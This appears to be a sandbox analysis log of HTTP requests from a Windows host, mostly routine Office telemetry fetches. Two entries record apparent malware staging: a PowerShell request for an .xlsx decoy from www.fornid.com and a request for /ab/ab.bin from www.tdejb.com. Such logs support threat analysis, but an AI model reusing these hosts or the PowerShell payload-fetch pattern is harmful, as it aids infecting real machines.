                        Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /ab/List%20of%20required%20items.xlsx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.fornid.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /config/v2/Office/excel/16.0.16827.20130/Production/CC?&EcsCanary=1&Clientid=%7b218D754C-5ACC-4240-B93A-04A1640018AE%7d&Application=excel&Platform=win32&Version=16.0.16827.20130&MsoVersion=16.0.16827.20130&ProcessName=excel.exe&Audience=Production&Build=ship&Architecture=x86&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&LicenseCategory=7&LicenseSKU=ProPlus2019Retail&OsVersion=10.0&OsBuild=19045&Channel=CC&InstallType=C2R&SessionId=%7bC4ECCB6C-B7DD-41E0-BCD4-0D9602B18E10%7d&LabMachine=false HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipIf-None-Match: "CLZpXYLcPto9RjiTXXMKLgZS7vJSi8dJL0Uz3IIB3+0="User-Agent: Microsoft Office 2014DisableExperiments: falseX-ECS-Client-Last-Telemetry-Events: ecs_client_library_name=MSO,ecs_client_app_name=Office,ecs_client_version=16.0.16827.20130Host: ecs.office.com
                        Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /ab/ab.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.tdejb.comCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
